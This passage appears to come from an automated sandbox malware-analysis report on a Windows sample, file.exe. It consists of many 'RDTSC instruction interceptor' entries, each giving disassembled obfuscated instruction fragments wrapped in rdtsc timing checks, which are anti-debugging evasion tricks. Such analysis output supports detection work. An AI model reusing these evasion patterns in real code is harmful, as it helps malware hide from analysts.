jne 00007FAAC5254A86h 0x0000005f popad 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925E7C second address: 925E92 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAC5092E58h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e js 00007FAAC5092E5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925F3E second address: 925FCD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAAC5254A8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 0FFF5D8Eh 0x00000011 mov dword ptr [ebp+122D1DF0h], edi 0x00000017 push 00000003h 0x00000019 or dword ptr [ebp+122D1960h], eax 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007FAAC5254A88h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b mov edx, 106A355Eh 0x00000040 push 00000003h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007FAAC5254A88h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 00000015h 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c adc edx, 4DD7B2C7h 0x00000062 sub dword ptr [ebp+122D2947h], edi 0x00000068 call 00007FAAC5254A89h 0x0000006d push eax 0x0000006e push edx 0x0000006f jng 00007FAAC5254A8Ch 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FCD second address: 925FD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FD3 second address: 925FED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAC5254A8Dh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FED second address: 925FF7 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FF7 second address: 925FFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925FFE second address: 926013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FAAC5092E56h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926013 second address: 926017 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926017 second address: 92601D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92601D second address: 926023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926023 second address: 926027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926027 second address: 92605B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jno 00007FAAC5254A9Dh 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915956 second address: 91597A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FAAC5092E64h 0x00000008 jmp 00007FAAC5092E5Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAAC5092E5Ah 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944AE4 second address: 944B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A91h 0x00000009 jnp 00007FAAC5254A8Ch 0x0000000f jns 00007FAAC5254A86h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944B05 second address: 944B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jl 00007FAAC5092E56h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944B25 second address: 944B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944B2D second address: 944B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAAC5092E56h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944CB8 second address: 944CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944CBC second address: 944CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAAC5092E56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jmp 00007FAAC5092E5Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E67 second address: 944E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E6C second address: 944E72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E72 second address: 944E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945593 second address: 945599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945599 second address: 9455D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Fh 0x00000007 jmp 00007FAAC5254A8Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jp 00007FAAC5254A86h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FAAC5254A93h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945842 second address: 945851 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945851 second address: 945865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007FAAC5254A8Ch 0x0000000e jc 00007FAAC5254A86h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945865 second address: 945879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnl 00007FAAC5092E56h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FAAC5092E56h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946312 second address: 94632B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FAAC5254A93h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94632B second address: 94632F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946A5D second address: 946A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A8Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946A6C second address: 946A72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A043 second address: 94A052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A8Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A052 second address: 94A056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A056 second address: 94A070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAC5254A8Ch 0x0000000d jo 00007FAAC5254A86h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94A070 second address: 94A074 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 910887 second address: 9108A2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAC5254A86h 0x00000008 jmp 00007FAAC5254A91h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9108A2 second address: 9108A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D06F second address: 94D0B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FAAC5254A99h 0x00000011 jmp 00007FAAC5254A94h 0x00000016 jnc 00007FAAC5254A86h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94FF26 second address: 94FF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C4EF second address: 91C501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAAC5254A86h 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FAAC5254A86h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C501 second address: 91C507 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C507 second address: 91C50C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95342E second address: 95344F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E69h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953E29 second address: 953E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FAAC5254A88h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953E36 second address: 953E3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954E17 second address: 954E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954E1E second address: 954E23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954E23 second address: 954E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FAAC5254A88h 0x0000000f jbe 00007FAAC5254A8Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954E99 second address: 954E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955A1A second address: 955A21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955A21 second address: 955A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FAAC5092E58h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 jmp 00007FAAC5092E63h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push esi 0x0000002b pushad 0x0000002c popad 0x0000002d pop esi 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955B25 second address: 955B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955B29 second address: 955B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955E38 second address: 955E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955E3E second address: 955E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955F42 second address: 955F48 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955F48 second address: 955F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956517 second address: 9565A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FAAC5254A88h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 call 00007FAAC5254A8Ah 0x0000002e jmp 00007FAAC5254A8Fh 0x00000033 pop edi 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 pushad 0x00000038 call 00007FAAC5254A98h 0x0000003d pop ecx 0x0000003e add bx, DA72h 0x00000043 popad 0x00000044 pop esi 0x00000045 xchg eax, ebx 0x00000046 jmp 00007FAAC5254A8Ch 0x0000004b push eax 0x0000004c pushad 0x0000004d jnc 00007FAAC5254A8Ch 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A159 second address: 95A15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95A15D second address: 95A180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FAAC5254A88h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FAAC5254A91h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AC7A second address: 95AD0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FAAC5092E58h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 cmc 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FAAC5092E58h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000017h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007FAAC5092E58h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 00000018h 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f mov si, 3000h 0x00000063 mov dword ptr [ebp+122D1B16h], ecx 0x00000069 xchg eax, ebx 0x0000006a push eax 0x0000006b push edx 0x0000006c jne 00007FAAC5092E5Ch 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95AA3E second address: 95AA5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAC5254A98h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B709 second address: 95B716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FAAC5092E56h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B716 second address: 95B7AB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FAAC5254A8Ch 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FAAC5254A88h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D1C9Bh], ebx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FAAC5254A88h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 jne 00007FAAC5254A86h 0x00000056 xchg eax, ebx 0x00000057 jmp 00007FAAC5254A8Ch 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jg 00007FAAC5254A9Dh 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960F97 second address: 961021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FAAC5092E58h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jmp 00007FAAC5092E5Fh 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007FAAC5092E58h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000018h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov ebx, 5ADC47C2h 0x00000048 push 00000000h 0x0000004a jmp 00007FAAC5092E64h 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 jmp 00007FAAC5092E62h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961021 second address: 961026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D35F second address: 95D373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAAC5092E56h 0x0000000a popad 0x0000000b pushad 0x0000000c jnc 00007FAAC5092E56h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961026 second address: 961038 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAAC5254A88h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961038 second address: 961055 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAC5092E61h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961F49 second address: 961F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96119F second address: 9611A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963F7D second address: 963F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9631B9 second address: 9631BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 963F81 second address: 963F87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9631BD second address: 9631D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9631D7 second address: 9631E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FAAC5254A86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96421D second address: 964222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965253 second address: 965259 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 964222 second address: 964236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007FAAC5092E64h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 965259 second address: 965274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 964236 second address: 96423A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 966F2C second address: 966F5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FAAC5254A8Fh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAC5254A98h 0x00000013 rdtsc
